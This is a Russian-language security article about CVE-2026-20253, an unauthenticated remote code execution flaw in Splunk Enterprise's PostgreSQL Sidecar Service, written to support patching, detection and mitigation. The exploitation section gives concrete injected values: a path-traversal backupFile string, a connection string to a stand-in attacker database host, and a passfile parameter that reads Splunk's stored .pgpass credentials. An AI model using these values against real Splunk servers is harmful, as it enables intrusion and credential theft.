Специалисты обнаружили критическую уязвимость CVE-2026-20253 в Splunk Enterprise, затрагивающую компонент PostgreSQL Sidecar Service (вспомогательный сервис для резервного копирования базы данных). Проблема позволяет неаутентифицированному злоумышленнику добиться удаленного выполнения кода (RCE) на уязвимой системе. Вендор уже выпустил исправления для поддерживаемых версий.
Уязвимость CVE-2026-20253
Splunk Enterprise является централизованной платформой для сбора, индексации и анализа машинных данных. Организации используют её как систему управления информацией о безопасности и событиями (SIEM-система), что предполагает хранение чувствительных логов, данных аутентификации, оповещений об угрозах. Компрометация такой платформы может привести к полной потере видимости инфраструктуры и создаёт предпосылки для дальнейшего продвижения атакующих внутри сети.
Уязвимость затрагивает следующие версии Splunk Enterprise: 10.0.0 - 10.0.6 (исправлено в 10.0.7), 10.2.0 - 10.2.3 (исправлено в 10.2.4). Версия 10.4.0 не уязвима. Для Splunk Cloud Platform проблема устранена в сборках 10.2.2510.14 и 10.4.2604.3. При этом важно отметить, что на Splunk Enterprise, развёрнутом на AWS, PostgreSQL Sidecar Service установлен и включён по умолчанию, что делает такие системы изначально уязвимыми. В ручных установках на Windows данный компонент либо отсутствует, либо отключён.
Корневая причина - комбинация нескольких недостатков безопасности в реализации сервиса. Эндпоинты, отвечающие за резервное копирование и восстановление (backup, restore), не требовали аутентификации. Кроме того, сервис недостаточно проверял пути к файлам, передаваемые в параметре backupFile, и не фильтровал параметры подключения к базе данных. В результате злоумышленник мог манипулировать операциями pg_dump и pg_restore (утилиты резервного копирования и восстановления PostgreSQL).
Техника эксплуатации включает несколько этапов. Атакующий сначала обращается к эндпоинту /v1/postgres/recovery/backup или restore через Splunk Web. Управляя полем backupFile, он может указать произвольный путь, включая обход каталогов (path traversal). Например, значение ../../../../../../../tmp/test позволяет записать файл за пределы рабочего каталога. Параметр database также находится под контролем злоумышленника, который может передать строку подключения hostaddr=attacker-db.example.com dbname=testdb. Это заставляет Splunk подключиться к подконтрольному PostgreSQL-серверу и выгрузить дамп, содержащий вредоносные SQL-объекты.
Далее полученный дамп используется на эндпоинте restore. Поскольку Splunk хранит доверенные учётные данные PostgreSQL в файле .pgpass, атакующий может указать passfile=/opt/splunk/var/packages/data/postgres/.pgpass в параметрах подключения и аутентифицироваться в локальной базе данных. Восстановление дампа приводит к выполнению произвольных SQL-команд, что в итоге позволяет записать вредоносный скрипт в каталог приложений Splunk. При последующем выполнении этого скрипта достигается выполнение произвольного кода с правами учётной записи службы Splunk.
Для эксплуатации не требуются ни валидные учётные данные, ни предварительный доступ к среде, ни взаимодействие пользователя. Атака может быть проведена удалённо при условии доступности уязвимых эндпоинтов. Исследователи из Resecurity опубликовали подтверждающий прототип (PoC), а также описали детектирующие признаки: запросы с последовательностями обхода каталогов (../), параметрами hostaddr=, dbname=, passfile=, а также неожиданное выполнение pg_dump или pg_restore и исходящие соединения Splunk к незнакомым серверам PostgreSQL.
Последствия полной компрометации включают доступ к конфиденциальным данным безопасности, модификацию индексированных событий и конфигураций, раскрытие учётных данных, закрепление в системе (persistence) с помощью изменённых скриптов и уклонение от средств защиты (defense evasion). Поскольку Splunk часто интегрирован с Active Directory, облачными сервисами и сетевыми устройствами, скомпрометированный сервер становится точкой для бокового перемещения (lateral movement) внутри сети.
Организациям, использующим уязвимые версии, необходимо немедленно применить патчи, выпущенные вендором. Дополнительно рекомендуется ограничить доступ к веб-интерфейсу и управляющим эндпоинтам, проверить логи на наличие признаков эксплуатации уязвимости, а также убедиться в целостности файлов приложений Splunk. Периодический мониторинг активности утилит pg_dump и pg_restore в сочетании с сегментацией сети для изоляции серверов Splunk от критически важных систем снижает риски даже в случае пропуска патча.
Ссылки
- https://www.cve.org/CVERecord?id=CVE-2026-20253
- https://github.com/0xBlackash/CVE-2026-20253
- https://advisory.splunk.com/advisories/SVD-2026-0603
- https://www.resecurity.com/es/blog/article/cve-2026-20253-splunk-enterprise-pre-authentication-remote-code-execution
- https://www.picussecurity.com/resource/blog/splunk-cve-2026-20253-unauthenticated-remote-code-execution-vulnerability-explained
